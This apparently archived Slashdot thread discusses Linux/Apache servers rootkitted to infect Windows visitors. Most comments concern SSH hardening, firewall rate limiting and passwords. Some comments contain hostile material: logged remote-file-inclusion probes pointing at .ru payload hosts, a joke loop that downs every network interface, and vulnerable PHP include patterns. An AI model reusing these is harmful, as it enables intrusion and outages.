People moving ssh ports are more likely to be tech savvy, and thus less likely to have weak passwords, plus the extra scanning time will severely impact the performance of the scanner.

Re:ssh + bad password

[skolima]

You mean DenyHosts? Works like a charm.

Re:ssh + bad password

[Niten]

Yeah, I think Panaflex is mistaken, or maybe just misspoke. Public keys don't work that way.

To be sure, there is a problem if you have people storing their private keys on the very network of servers you're trying to control access to. But there's no excuse to do that even if you do need to log into these servers from one another, since you can just run ssh-agent on your workstation and forward this local agent over your session with ssh -A. There's still a risk associated with agent forwarding, as outlined in the OpenSSH man pages, but it's a comparatively moderate one.

Re:ssh + bad password

[toadlife]

I stand corrected (see my post below). The last time I used OpenBSD was 3.5.

Re:ssh + bad password

[DaleGlass]

edit /etc/ssh/sshd_config

PermitRootLogin no

If you want to disable password auth and use keys instead:

PasswordAuthentication no

Re:ssh + bad password

[toadlife]

I actually don't mind those brute force bots. It makes for a good laugh once in awhile.

Re:ssh + bad password

[dbIII]

suprising it's not a part of any distros

It's not included because it is a useful behaviour if you have a well behaved attacker that doesn't know you are doing it. If they know you are doing this you have given a remote attacker a way to rewrite your firewall rules. All they can do is make you drop stuff but that can still be disruptive if they spoof addresses.

Re:ssh + bad password

[Panaflex]

Sorry, I wasn't clear:

I've had admins on my network simply copy both pub & private ssh keys from server to server (they're in the same directory). They leave the private keys on the machine and forget or don't know what they've done. An attacker with root on that machine can then su into the account and access other machines.

Re:ssh + bad password

[billcopc]

That's funny, I allow root ssh on all my boxes.

From my own IP ranges, that is. Home, work, my other boxes. I don't see why anyone should be trying to ssh into my gear if they're not me.

In fact, I drop all other SSH accesses at the firewall, and I use a key pair to login.

My real worry is the actual web server. It's hard to run any ready-made apps like posting boards, galleries or others - they're all coded by retarded teenage monkeys who apparently learned everything they know from PHP 3.0. Nothing says "fuck korea" like a bunch of rogue processes running as the apache user.

Re:ssh + bad password

[AMuse]

Although your advice is good, I HAVE seen situations in which it was very helpful that root was allowed to do a remote SSH login.

In one of those situations, / and /home were on different disks on a machine at a colo. The disk containing /home was failing and locking up any attempt by regular users to log into the box (preventing a sysadmin from logging in and sudo'ing), but since / (the root disk) was OK and that's where root's homedir was stored, root was also able to log in and do a safe unmount of the disk remotely. The backup disk was then able to be mounted and operations continued smoothly without an hour drive to the colo facility.

Yes there are other creative ways to also try to get past the failing disk lockup issue -- just pointing out that not all situations are "OMG you should NEVER allow this!!" type situations.

Re:ssh + bad password

[billcopc]

Everywhere I go, people say "don't login as root", and yet every box I run, I login as root almost exclusively (unless I'm testing a bitch account).

So am I just so infinitely brilliant that I am immune to root mishaps, or are you still going to tell me I'm extremely lucky ?

Most people manage Windows servers as Administrator, and for the most part, it's Microsoft bugs that will get you, not your choice of unencumbered system accounts. Sure, it doesn't stop me from hosing my entire system with a few misjudged commands, but as I said earlier, my endless wisdom prevents me from doing so, and my various network security schemes ensure that I'm the only root on the box. For me, that's more than safe enough.

Re:ssh + bad password

[g-to-the-o-to-the-g]

This can be done with iptables on Linux. I use something like:

IPTABLES="/sbin/iptables"

$IPTABLES -N SSH_CHECK
$IPTABLES -A INPUT -p tcp --dport 22 -m state --state NEW -j SSH_CHECK
$IPTABLES -A SSH_CHECK -m recent --set --name SSH
$IPTABLES -A SSH_CHECK -m recent --update --seconds 120 --hitcount 5 --name SSH -j LOG --log-level=warn --log-prefix "SSH Dropped "
$IPTABLES -A SSH_CHECK -m recent --update --seconds 120 --hitcount 5 --name SSH -j DROP

Re:ssh + bad password

[srwalter]

### MACROS AND TABLES SECTION
table persist

### PACKET FILTERING SECTION
block in quick on $if_wan inet from
# ...
pass in on $if_wan inet proto tcp from any to ($if_wan) \
port ssh flags S/SFRA synproxy state \
(max-src-conn-rate 3/30, overload flush global)

How is that different from the Linux iptables commands:

iptables -A INPUT -p tcp -m tcp --dport 22 -m recent --set --name ssh --rsource
iptables -A INPUT -p tcp -m tcp --dport 22 -m recent ! --rcheck --seconds 60 --hitcount 4 --name ssh --rsource -j ACCEPT

Re:ssh + bad password

[Niten]

How is that different from the Linux iptables commands:

iptables -A INPUT -p tcp -m tcp --dport 22 -m recent --set --name ssh --rsource
iptables -A INPUT -p tcp -m tcp --dport 22 -m recent ! --rcheck --seconds 60 --hitcount 4 --name ssh --rsource -j ACCEPT

They differ in three ways:

1. My router's PF rule blacklists hosts indefinitely, until they are explicitly cleared from <wan_bruteforce>
2. The PF rule has less overhead on subsequent connections, for whatever that's worth
3. I had forgotten about the netfilter reject module ;)

Re:ssh + bad password

[BillKaos]

The best solution is store your key in a USB key or a trusted machine.

Then run
$ ssh-add
$ ssh -A $HOST # -A tells ssh to forward your agent.

and your key will be trasmitted from machine to machine in memory, so you'll have your private key as long as you are logged in.

Re:ssh + bad password

[Le+Sale]

It would be fun to see such dedication on a Microsoft OS instead of the running dog for a change. Imagine if the Net. Admins would actually care about not being Domain Admins, input passwords left & right .. oh right. That would make sense, and M$ wouldn't be the evil doers they currently are, and Linux the savior of mankind. Because using strict, "structured" commands, and minimizing the role of a server is k3VV1 on Linux, but st00p1d on Windows (since they're evil).

Re:ssh + bad password

[thogard]

Have good passwords.
I had a program long ago that would tell you how quickly it would guess your password. It was based on one of the programs like "John the Ripper" and it would tell you the detail of which pass and rule set it would generate your password so that it might report "l3tm31n" as
1) common password "letmein" with 2) 1 typewritter leters for numbers for the i=1 and 3) leet speek for e=3
too bad I can't find that program. I think it would make an excellent pam module.

Re:ssh + bad password

[richlv]

by far the easiest solution :
iptables -A INPUT -p tcp --syn --dport 22 -m limit --limit 5/minute --limit-burst 3 -j ACCEPT
iptables -A INPUT -p tcp --syn --dport 22 -j DROP

and oesn't require you being awake all the time or installing anything on servers ;)
finetune the values to your liking.

Re:ssh + bad password

[cybaea]

was most surprised when I found that Redhat ... appears to allow [root to ssh into your machine] as the default.

Useful when you are setting up a brand new (remote) server. You are supposed to use the access only once to (a) create a new account and (b) disable root ssh access (by setting 'PermitRootLogin no' in /etc/sshd/sshd_config).

Re:ssh + bad password

[jhol13]

I would add "AllowUser" directive to the sshd_config - rarely every user needs ssh (you can set a group which is allowed).

And set "PermitRootLogin" to "no".

Re:ssh + bad password

[gosand]

The quick and dirty way is to move SSH to a non-standard port.

I had done this in the past on my home server, but then ran into firewall issues where I worked - I couldn't get out on the port that I set it up on. I know there are ways around that, but I was looking for some kind of cleaner solution. Also, I have found that FTP gets hammered too sometimes, so I think that some of the IPTABLES solutions others have provided will fit more nicely with what I was looking to do.

Re:ssh + bad password

[ls671]

I use to do just the same as you do but like some processes, I have to sleep sometimes ;-)

So I decided to do just as you suggest; "have something a LITTLE more automated", I just decided to script exactly what I (and you) are doing, quick and dirty, no design really involved.

This is a really inefficient Mickey Mouse script from a performance point of view, but it works just fine ;-) I just run it every minute from cron and flush the rules at given intervals to re-enable the IPs. It is so simplistic that I have always been ashame to publish it anywhere.

TODO: implement something more efficient that at least uses tail -f and maintains state and counts.
NOTE: 10.10.1.7 is used to scan the network for vulnerabilities.

export PATH=${PATH}:/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin:/bin:/sbin
export IFS="
"

TMPPATH=/tmp/scans

rm ${TMPPATH}/* 2>/dev/null

for BADIP in `tail -n 3000 /var/log/messages | grep sshd |\
                              grep "Failed password" |\
                              cut -c 8- | cut -d " " -f 11 | grep "\." | grep -v "10.10.1.7"`
do
echo X >> ${TMPPATH}/${BADIP}
done

for BADIP in `tail -n 3000 /var/log/messages | grep sshd |\
                              grep "Failed password" |\
                                cut -c 8- | cut -d " " -f 9 | grep "\." | grep -v "10.10.1.7"`
do
echo X >> ${TMPPATH}/${BADIP}
done

for BADIP in `tail -n 200 /var/log/proftpd.log |\
                              grep "no such user" |\
                              cut -d "[" -f 3 | cut -d "]" -f 1 | grep -v "10.10.1.7"`
do
echo X >> ${TMPPATH}/${BADIP}
done

for BADIP in `tail -n 1000 /var/log/proftpd.log |\
                              grep "Login failed" |\
                              cut -d "[" -f 3 | cut -d "]" -f 1 | grep -v "10.10.1.7"`
do
echo X >> ${TMPPATH}/${BADIP}
done

for FILE in `ls ${TMPPATH}`
do
let COUNT=`grep -c X ${TMPPATH}/${FILE}`
####echo ${COUNT}

if [ ${COUNT} -gt 20 ]
then
BLOCKED=`iptables -n -L INPUT | grep ${FILE}`

if [ "${BLOCKED}" = "" ]
then
echo ${FILE} count: ${COUNT}
grep ${FILE} /var/log/proftpd.log /var/log/messages
iptables -I INPUT -s ${FILE} -j DROP
fi

fi

done

Re:ssh + bad password

[gnuman99]

OR,

  * allow root to login
  * disable passwords
  * only allow ssh access from one IP address
  => SSH exploits be dammed.

Re:Funny

[Undead+Ed]

"they're guessing it was a root password that was stolen"

A pretty good guess, otherwise we could expect to see millions of Apache web servers compromised (there are over 75 million Apache web servers in active service) and anticipate a much greater number of Windows clients infected.

The significance of this story is not that Windows clients are the target, the significance is that the infecting agent is originating from Apache/Linux servers.

Ed

Re:Funny

IIS6 has never had a remote code execution hole. Ever.

Re:mkdir 1 Un-cross keys, avoid the Lahar...

[davidsyes]

Are your R's and B's "Crossover" keys, or Virtual Keys, or VirtualBox keys?

Run your tummy makes me think of being run over, or loosing a hot bowel of a lahar surmounting, umm, surpassing even Mt. Pinatubo.

Re:Funny

[studpuppy]

Would you blame a lock company if the user left his keys in the lock?"

Depends. How good is my lawyer?

Re:Software sucks.

[MacarooMac]

We certainly can't keep upgrading software every time a bug is found, if bugs keep cropping up at the current rate

You just watch me ..or at least, my avast! AV.

Re:Software sucks.

[vux984]

It's high time for better software, and the only way to get that is to apply market pressure. Software liability is the answer.

1) If the market really wanted extensive 'software liability' then we'd already have it. Customers would demand it, suppliers would figure out how much it would cost to provide it, and prices would sort themselves out. Turns out the prices go WAY up, and customers (most of them) don't want to pay them.

2) What happens to Linux in a world with mandatory software liability? Who is liable? The company providing install and support? The volunteer contributor who wrote that line of code? The project maintainer who accepted the patch? ... And you wonder why your post was modded flaimbait?

Re:Ubuntu as well?

[symbolset]

It's possible to install software on a Linux webserver that exploits vulnerabilities in Windows clients. This is news?

Here's a shocker: it's possible to exploit Windows boxes with services hosted on a Commodore64.

Windows has more malware packages than legitimate software packages. They've really solved that ease of installation problem.

Re:Software sucks.

Cool. I'm ready to sue open source developers -- I have to work around bugs all the time. How many major projects (servers, libraries, languages/runtimes) don't have bug fix releases all the time?

You'll have to show you took necessary precautions. Ready for that? MS is. Read up on their security precautions these days (SDL, etc.).

Are you sure your up to the task? If so, what open source projects are you working on?

Re:Funny

[Trigun]

How many lawyers are good?

Re:Funny

Ed,

Please let me know what the last critical security flaw for IIS was. I'd love to know.

Also, let me know how many critical security flaws there have been for Apache in the last year or so.

Thanks!

Re:Software sucks.

[Schraegstrichpunkt]

Yeah. People should be held liable when they know full well that Microsoft has a track record for bad security, but choose Microsoft products anyway.

Re:Funny

[davidsyes]

In retrospect, I now wonder if this affected 1and1 late 2006 to early 2007. There were 3 times that one of my sites on 1and1 was affected. As in just inaccessible tho it would run for weeks and I hadn't changed anything. But, 1and1 were fast enough to fix it in under an hour. I used to be "paranoid" that some government agency was just trying to block my page (not necessarily the US, but maybe an Asian government). But I relaxed and nixed that line of thinking as no content was changed. It's been many months since I changed ANYthing on it.

Anyway, we all know the US, Russian, Chinese, and other governments regularly appear in the news condemning one another for staging shocking, penetrating attacks on each others military and infrastructure networks. Of course, we should not assume Japan, Israel and others are NOT conducting their own probes and audits, either.

If there IS malice involved, I'd venture to say the testers left the vuln as a message, or they slipped up and got discovered, but their tool bag was not left behind full...

But, then, I wouldn't put it past ms to be involved with this to undermine IT departments using heterogeneous servers. OH NO....

Re:Software sucks.

[WaHooCrazy7]

Would you please tell me which one of the hundreds if not thousands of developers should be sued when OSS has a bug in it? Also, there is no way we could process that many law suits...

Re:Software sucks.

[Garridan]

Simple! Just don't upgrade. Problem solved! Don't worry, the rootkit seems to be spreading malware to windows users. They're used to it anyway -- it won't actually harm your linux box, so what's to worry?

Re:Software sucks.

[morgan_greywolf]

It's FUD that been spread around by Microsoft and their cronies (read: SCO) since the Caldera^WThe SCO Group sued IBM.

Microsoft certainly does not live up to this. Attached to every copy of Windows in the EULA is a disclaimer of liability, including special liability.

Re:Funny

[plague3106]

No, not really a good guess. It could be only Apache on a certain distro, with a certain version. Apache runs on Unix as well, so you can rule all those Apache installs out (the article seems to point out Linux, IIRC).

I agree with your reasoning on the significance of the story.

Re:Should have used *BSD

[Klaus_1250]

I'll take my chances with *BSD.

Re:Ubuntu as well?

[nicklott]

Microsoft? This story is on posted on linux.com and being hyped on a OSDN site, where do microsoft come in? They must have a pretty deep mole to get this one planted...

Re:Ubuntu as well?

And the malware infects Microsoft clients, genius.Don't get me wrong, I think this is a big deal, but his point is that unless you are running Windows OR have an Apache webserver this doesn't effect you. Linux desktop users are not effected.

Re:LISTEN UP

[0racle]

Whoa there buddy. Are you saying anything before 1990 is not underage?

GOD DAMNIT! How am I becoming old?

More details are available...

... though a solution has not been yet:

http://blog.trendmicro.com/e-commerce-sites-invaded/

If you happen to have one of these compromised systems, I am sure that Trend would like to talk to you about it...

Re:Software sucks.

[KublaiKhan]

Ain't the software that's at fault here--it's people who give out their root passwords, or have easily cracked root passwords.

Re:Ubuntu as well?

"but his point is that unless you are running Windows OR have an Apache webserver this doesn't effect you."

Well I am sure the 3% of the population that don't fit into either category are relieved as hell.

Re:Software sucks.

[0racle]

I agree. The people who made this problem possible should be sued and held accountable.

Now then, which admin is first for choosing bad passwords?

I'm not sure I buy it

[mlwmohawk]

There is something suspicious about this report. Some things can't happen the way people say they happen, and when that is the case we have to look at more likely scenarios.

I would bet the path of the TCP/IP packets route through compromised providers who have an injection strategy. Remember a few months ago how IPSs were injecting their own java script and ads into the pages of other sites?

http://ars.userfriendly.org/cartoons/?id=20070703

This is the most likely scenario I can think of.

Re:I'm not sure I buy it

[SpaceLifeForm]

Infected ad-servers would be the easiest.
Some malicious flash would do the trick.

Re:I'm not sure I buy it

[mlwmohawk]

Infected ad-servers would be the easiest.
But it doesn't fit the available facts.

Re:I'm not sure I buy it

[whitehatlurker]

Some things can't happen the way people say they happen

I'm not sure exactly what it is that can't happen. I have downloaded infected pages (after taking the necessary precautions) through several paths, and I get the line with the javscript file inclusion - always on the first page from the server, rarely after that - and can download the javascript malware. The file does not exist on a second download attempt. Everything I have seen - which does not include an infected system, up close and personal - is consistent with the general theories presented so far.

While it could be injection from a third party (I must admit I haven't tried an SSL connection) that would mean that there are many compromised routers out there, which is a much scarier proposition than some compromised servers.

So, in short, what is it that can't be done?

Re:I'm not sure I buy it

[mlwmohawk]

So, in short, what is it that can't be done?

I did some looking around and what I find questionable is that they can't find any evidence of hacking. That the administrators can't find it.

The end result is obviously common, but the mode of attack is suspect.

Re:I'm not sure I buy it

[whitehatlurker]

they can't find any evidence of hacking

\begin{snarky}
I'm surprised some of these "admins" can find their servers, let alone moderately well hidden rootkits.
\end{snarky}

Many system administrators do not have a deep background in *nix security. If they can install a Linux box, they're apparently qualified. There are many admins who are extremely competent in security matters, but I have not seen anything coming from those people. (Perhaps they weren't infected?) So, I have not heard (read) of anything from anyone describing a good analysis of an infected machine. The best so far is the cPanel note. There they do mention that "[i]t is common to see a short but successful root login via ssh 5-10 minutes before the compromise occurs" which in my mind is already a compromise.

Passwords are still the big exposure.

[argent]

* Don't allow root to ssh into your machine.

This shouldn't be a big deal unless root also has an easily guessed password.

* Have good passwords.

Absolutely. Try "squam1sh666oss1frage" instead of "susan". Check your other users too, particularly people in group wheel. I had an account used as an attack because it was set up with an easily guessed name and password and I was never actually given the password - I always sshed in with a DSA key.

I would add:

* Have a string password validator, but don't force people to cycle passwords... that encourages easily guessed passwords because easily remembered ones are easily guessed. The best password validator is to run the best password cracking tools you can lay your hands on against your own password file. :)

Re:Passwords are still the big exposure.

Try "squam1sh666oss1frage"

That's amazing! I have exactly the same combination on my highly secure luggage. Well, I did, anyway.

Thanks a lot, asshole.

Re:Passwords are still the big exposure.

[MichaelSmith]

Check your other users too, particularly people in group wheel

Which is hardly an advantage on Linux because everybody can su to root. We have RMS to thank for that one. Apparently the GNU way is fairer to the users.

Re:Passwords are still the big exposure.

[zcat_NZ]

your example password lacks mixed-case and punctuation.. I usually aim for at least two characters of each.

"sqU@m1sh666Oss1$rage" perhaps?

Re:Passwords are still the big exposure.

[argent]

I have exactly the same combination on my highly secure luggage. Well, I did, anyway. Thanks a lot, asshole.

y0ure666welc0me

Re:Passwords are still the big exposure.

[blaine+the+monorail]

You can also use PAM to limit su to users of the wheel group. Just add auth required pam_wheel.so to /etc/pam.d/su (http://www.kernel.org/pub/linux/libs/pam/Linux-PAM-html/sag-pam_wheel.html)

Re:Passwords are still the big exposure.

[argent]

your example password lacks mixed-case and punctuation.

It also only has one misspelling and contains real words. :)

It's an example of something I think the average user might be willing to put up with.

The more you can memorize, the better, but if someone's got rainbow tables big enough to cover "squam1sh666oss1frage" then you're better off with "tquamish666ossifrabe", since there's 25 possible substitutions for each symbol, rather than 3 or 4 (eg, "a" to one of [A@4]). Once you go to non-mnemonic symbol substitutions, you might as well pick something like "abgflynt6yta" or "qe5t-agxe-596p-epea-guxv-6gre" or even "550e8400-e29b-41d4-a716-446655440000"... because most people simply aren't going to be arsed trying.

Even getting people to use something like "3 words 2 numbers" (elvish17puce24capital) or even "2 words 1 number" (squeamish46ossifrage) would be infinitely better than "one word and one number if you're lucky" most people use.

No smiley. I'm unfortunately serious. :(

Re:Passwords are still the big exposure.

[BlackSnake112]

I usually tell people to think up a phrase that they can remember.

Jack and Jill went up the hill --> Jack&Jillwent^th3H1ll

Or something similar. Most people I say this too are surprised that a password can be longer then eight characters.

Re:Passwords are still the big exposure.

[dbIII]

Don't allow root to ssh into your machine.

This shouldn't be a big deal unless root also has an easily guessed password.

With the sheer number of dictionary attacks I decided it was both not worth the risk and amusing to look at the logs of people trying to get in for hours at a time to a locked out account. For some reason a lot of the ssh attacks are for "Administrator" which seems a little odd to me unless there are a lot of MS boxes with ssh on them.

A coworker turned a locked down mail server at another site into something easily cracked by removing the firewall rules that restricted ssh traffic to specific hosts, by giving all email users a shell, by letting users have such passwords as "coffee", by installing a compiler, by going "chmod -R 777" on /etc to make it easier to edit configuration files and by not applying security updates. There's nothing like looking at the removed disk of a rooted box to remind you that it's worth at least doing the easy steps to secure things every time even if you don't think it is going to be directly exposed to the net and not worth doing the more difficult stuff.

Re:Passwords are still the big exposure.

[sjames]

chmod 04750 /bin/su

Re:Passwords are still the big exposure.

[MichaelSmith]

There are lots of ways to reconfigure GNU su, as others have pointed out. I just think it is weird that RMS thinks it is okay to leave a security hole in a tool because somebody once pissed him off by changing a root password and not passing it on.

Re:Software sucks.

The market would immediately demand software liability if the users of software became liable for defects themselves. Your server got rooted and sent credit card information to Russia? Pay up. You can get your money back from the guy who wrote your swiss cheese web server.

I call Bullshit!

FTFA:FTFA - "The random js toolkit was detected using Finjan's patented real-time code inspection technology while diagnosing users' web traffic during December 2007..."

This is all just a ploy to bring attention to Finjan for financial gain!

Re:I call Bullshit!

[EmagGeek]

Wouldn't surprise me if Finjan were the author of the rootkit. After all, we all know that the percentage of viruses created by contractors hired by virus software companies is not zero.

Re:Ubuntu as well?

[BorgCopyeditor]

But why male models?

All your BASE are belong to us

[davidwr]

All your BASE are belong to us.

Re:Funny

[Ngarrang]

Would you blame a lock company if the user left his keys in the lock? That standard policy on Slashdot.

Re:Software sucks.

[misleb]

How is that flamebait? I'm dead serious. If the quality of software doesn't improve dramatically, we're going to be in a world of hurt very soon.

Why "soon?" What is going to change in the near future that will make insecure software/configurations any more of a threat than they already are?

How do you suggest we achieve that improvement if not by making authors of faulty software liable for their negligence?

Diversity is one good way of avoiding large scale security related disasters. Sure, individuals will still get hurt, but if theres a broad range of software options available (and used) there's not much that can take down the internet as a whole or put us in a "world of hurt."

We certainly can't keep upgrading software every time a bug is found, if bugs keep cropping up at the current rate.

What "rate" is that? Do you have statistics that show that software is getting less secure or more bugs are found? My subjective impression is that software in general is getting better on the whole. And security is slowly becoming more of a priority. The only thing that is changing is the scale of the exploits when a bug is found. No longer is it important to have control over individual systems. Black Hats need botnets. Again, more diversity will help greatly in keeping the effect of this to a minimum. Holding software vendors monetarily responsible for hacks would kill the industry and possibly hurt diversity.

Besides, who is goign to pay when free software is exploited? Can you really justify extracting money from developers who offer their wares to the public for free?

-matthew

Re:Funny

[Undead+Ed]

"It could be only Apache on a certain distro, with a certain version."

Yet another persuasive argument to avoid the technological mono-culture that is Microsoft Windows.

Ed

Im not from this planet MONKEY BOY!

[ekimminau]

Just remember, wherever you go, there you are.

Re:Im not from this planet MONKEY BOY!

[whitehatlurker]

Hey, hey, hey. Don't be mean. - Character is what you are in the dark.

Re:Software sucks.

[mlwmohawk]

Software has to suck because the market can't afford software that doesn't suck. Kids out of high school and collage or fresh out of joe's web school. aren't qualified to write good software, yet this is what companies hire over more experienced people.

Even then, there is no ability to develop your skills because you spend 99% of your time learning new environments.

Software is HUGELY complex these days and it takes a log of study, knowledge, and skill to be any good at it. Companies don't want to hear that. They want to increase productivity by "KLOC." (Un)fortunately, there is a lot of "art" and "creativity" in software development and without well defined product specs, rigid test plans, and quality assurance which adds delays and cost to a project you won't get better code.

Standard business upside potential vs downside risk. Upside potential: first to market, profit!!! Downside risk: blame some hacker.

Re:Ubuntu as well?

[wall0159]

What's this nonsense? Ubuntu is Ubuntu. ...and that's kinda related to Mac, right? Just... more browner.

Re:Funny

[Knuckles]

IIS6 has never had a remote code execution hole. Ever.

That you know of.

Re:Is Idiocracy coming true?

[zcat_NZ]

happy geek has run out of happy :-(

Sounds like a cPanel issue

[druiid]

The articles on this keep mentioning cPanel. Now, I've never used or looked at that specific web CP, but it seems likely to me all the attackers would have to do is find a vulnerability on of the scripts used for updating the configs, or adding a DB entry to update the configs, etc. Yes, I know this supposition is light on detail, but given what most control panels eventually have to have access to, seems the more likely than some mystery apache exploit... just tell the scripts they need to update the configs.. or use them to push an update to the machine, etc.

Re:Funny

[Undead+Ed]

"Please let me know what the last critical security flaw for IIS was. I'd love to know."

I don't know. I don't run (any) Windows or IIS. I do know that Microsoft.com hides behind a protective curtain of Linux proxy servers.

"Also, let me know how many critical security flaws there have been for Apache in the last year or so."

None that I have come across - and I do run LAMP stacks; it is SO EASY to make a LAMP stack bullet proof.

Ed

Re:Funny

[geekoid]

I'll need to ask my lawyer.

Re:Ubuntu as well?

Yeah, there's no way a company like Microsoft would have the resources to spread false information on internet sites.

Re:Ubuntu as well?

[Christianfreak]

Exactly. Also this gem from the article:

Other than using and safeguarding secure root passwords, not much can be done at this time to be proactive in preventing servers from being compromised,

Turn off root's log in and get rid of cPanel and similar programs as well. I understand the need for an easy to use remote admin tool (as much as I'd love people to actually learn the shell), but can't we do better than a web-based program for this stuff?

The low UID of the high heeled boys...

[argent]

Which is hardly an advantage on Linux because everybody can su to root.

OK, check ALL your other users.

Limiting it to group wheel is not a particularly big hurdle. There are enough applications setuid to root to find execution exploits in that one more is not much of a barrier.

The common UNIX implementation whereby group 0 or UID 0 membership acts as the gateway to such unobvious capabilities as opening low ports really needs to be readdressed. Traditionally, you would have group access to devices (eg, /dev/tcp/25) acting as the required capability, rather than having to become superuser for such a common operation.

Re:The low UID of the high heeled boys...

[thogard]

I've been pushing for group mappings to map to ports for a while with no luck. The idea is that you put your apache startup user in group 80 and 443 and your email listern process in group 25 and 587 and then they don't have to be root at all to bind. It used to be about a 40 character patch in the Linux kernel but no one ever seemed to interested.

Mystery h18.ru requests??

[tdashton]

Seems as good of a place as any to mention it, but maybe it has something to do with the multitudes of requests for URLs like: /exclusives.php?id=hxxp://amymusicgirl.h17.ru/mysong.txt?
/exclusives.php?id=hxxp://amyru.h18.ru/images/cs.txt?
/exclusives.php?id=hxxp://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?

( tt changed to xx in protocol )

that I've been seeing in my logs for the last 8 months or more.. Or are these just a poor attempt to spam webmasters?

HMMM

Re:Mystery h18.ru requests??

[jafiwam]

That stuff has been going on a long time. (10 years)

It's spamming the often exposed and ignored log reporting tools that get posted to web pages automatically. Several of the common tools helpfully convert those strings to URL links.

So, the spammer then gets a link pointing to their site that Google might find, increasing ranking, causing more ad hits, etc.

Re:Mystery h18.ru requests??

[coppro]

'incdlue($_GET['module']."/index.php");' is quite simply the most security-improving spelling error I have ever witnessed. That's why you don't spellcheck, kids. It protects your machines, just like 'for interface in `netstat -i | egrep -o "eth[0-9]+"`; { ifdown $interface; }' does.

Re:Mystery h18.ru requests??

[schweini]

See? That's something i hate about PHP - i'm a kind of sloppy perl-coder myself, but this whole shielding-bad-code-from-the-evil-internet mentality has to stop. Why would apache, using a special module, have to baby-sit PHP applications? The correct way of doing this is to simply always check the input you're getting, and only letting known good values pass - especially if you're going to use some function that might pull data from the internet. Obviously, adding additional layers of security around applications that are already as safe as possible doesn't cause harm, but i've just seen PHP coders get away with the belief that their "safe mode" or some other patch or hack will protect them from evil, or considerably increase the security of their programs, even though their programs are just deeply flawed in the core. Often, they just run around like headless chicken screaming that the world is going to end if you don't switch on some RewriteRules (they don't understand themselves) that some blog told them would protect them from having to actually consider using placeholders for database calls, and other good practices like that. sigh.
</rant>
Sorry - i don't think YOU meant to say that mod_security is a replacement for basic good programming practices, but i just had to vent a bit, and your post reminded me...

Re:Mystery h18.ru requests??

[Just+Some+Guy]

If you code does this: incdlue($_GET['module']."/index.php");

...then you should be dragged out and shot. And shame on PHP devs for allowing that in the default install. I mean, how often has anyone really wanted to run code off a remote server? It's like Active-X on crack.

Re:Mystery h18.ru requests??

[GigsVT]

A security blanket eh, you mean like perl tainting?

Fail2ban

[crumley]

Fail2ban is another nice way to deal with these brute force attacks.

Re:Fail2ban

[whoever57]

Fail2ban is another nice way to deal with these brute force attacks.

You can use fail2ban, but SSH can be protected very nicely with Netfilter/IPTABLES -- just limit the rate of new connections to something like 3 per 3 minutes for each host and this will slow down any dictionary attack to the point that it is very unlikely to be successful.

Re:Fail2ban

[Shao+Ke]

I just moved my ssh server to a random port. No more brute force ssh attacks.

Re:Fail2ban

[rhavenn]

Why stop there. Just use FreeBSD and PF filter and just add them to a ban table after more then 5 connections in 1 minute or whatever number you want. Once a week dump the ban table.

Re:Fail2ban

[atli]

Wouldn't using iptables rate-limit effectively create a DOS vulnerability?
If you get a lot of connection attempts/port scans to TCP/22 you can't log on.

Re:Fail2ban

[Soylent+Beige]

No, you're rate limiting, and then denying, connections on port 22 for the offending IP address. Every other IP address that is allowed access to port 22 still can have at.

Re:Fail2ban

[Just+Some+Guy]

You can use fail2ban, but SSH can be protected very nicely with Netfilter/IPTABLES

...or you just turn off the damn password authentication and watch attackers try to brute-force a 2048 bit RSA key. Honestly, people, it's not that hard!

Re:Fail2ban

[ahsile]

I use two factors for SSH protection:

1) Public key authentication
2) Denyhosts

Re:Fail2ban

[WuphonsReach]

I just moved my ssh server to a random port. No more brute force ssh attacks.

We do that too for our internet-facing servers. It cuts the chatter in the log files *way* down.

(We also require the use of public keys in order to authenticate via SSH2. Moving the SSH port was mostly to just reduce the noise in the log files.)

Re:Fail2ban

[Crayon+Kid]

...or use the rate limiting built in the SSH features already. Honestly, using iptables as a kitchen sink for security is NOT sane practice.

Re:Bad PHP Code

[FlyingGuy]

Huh??

I am not clear on the concept you are suggesting. Do you mean something like:

• include $_GET['some_get_value'] ;

Re:Ubuntu as well?

[stuntpope]

His main point was insightful. There are two parts to the story - one, Linux servers running Apache have been compromised. Two, these servers are infecting Windows clients through vulnerabilities in those clients. This exploit does not affect non-Windows computers.

If the current thinking is indeed that the Linux servers were inappropriately accessed through stolen passwords, how is that a security flaw of Linux or Apache? Like he asked, how is using a legitimate password equal to cracking the server?

On the other hand, turning Windows clients into bots *IS* an example of that software's (and QuickTime's and Yahoo! Messenger's) insecurity and vulnerability!

Re:Funny

[Trigun]

Unless you need a shovel to go ask him, the general consensus is "No".

Re:Ubuntu as well?

[mhall119]

The article says there is no current evidence that the Linux machines were compromised because of a software vulnerability, they're speculating password cracking or social engineering got them root access. The Windows machines, however, get infected because of a software vulnerability on them.

please don't

[emj]

I have a pretty long password, and I'm pretty bad at remembering things.

Besides hopefully you don't have 12345 as root password, because anything but that will be pretty hard to brute force. I'm fine with people trying to log on as root on my machine. They are going to need a lot of time to find my password that way.

Go ahead, try to guess my root password

[Slashdot+Parent]

Why do people allow the public Internet to brute-force accounts on their systems? There are plenty of ways to cut off IPs who have too many failed login attempts. Or, you could do what I do:

[casper]$ ssh myserver.com
Permission denied (publickey).

In other words, if you want to log into my server, you need a certificate. No password-based logins are disallowed by system policy.

Re:Go ahead, try to guess my root password

[Slashdot+Parent]

More caffeine input required.

That should have said "No password-based logins are allowed by system policy."

Re:Funny

[ray-auch]

Stolen password would be a vector into Apache servers on other platforms as well - but the reports so far seem to be saying it is just Apache + Linux servers.

If that _is_ the case, then it is more likely to be a weakness specific to that stack (possibly only certain version combinations) than a password compromise. The weakness may also be in something else installed on that stack, and thus applicable to only a small fraction of the 75M apache servers (eg. LAMP + particular PHP extension / application).

Re:Funny

[Trogre]

On hundreds of machines at the same time though?

Yes, I will (Re:please don't)

[mi]

I have a pretty long password, and I'm pretty bad at remembering things.

You can not login as root to a BSD-machine, even if you enter the password correctly from the first attempt. That's the point. And if you are a legitimate user here, you would know this and would not even try.

Which means, all those, who try, are not legitimate and should be blocked on-sight...

Re:Funny

[mhall119]

Can't blame PHP entirely here, the PHP process runs as the webserver, which should _not_ have root access. If a PHP forum was used, then there is a vulnerability in Apache and/or Linux.

I still think it's a lousy password and/or lousy password security to blame.

Re:Bad PHP Code

[erayd]

They mean using remote includes - for example:

include('http://somesite.com/somescript');

Re:Funny

[cp.tar]

How many lawyers are good?

I think their class restricts them to Lawful Evil; should they change alignment, they et disbarred. So, none, at a guess.

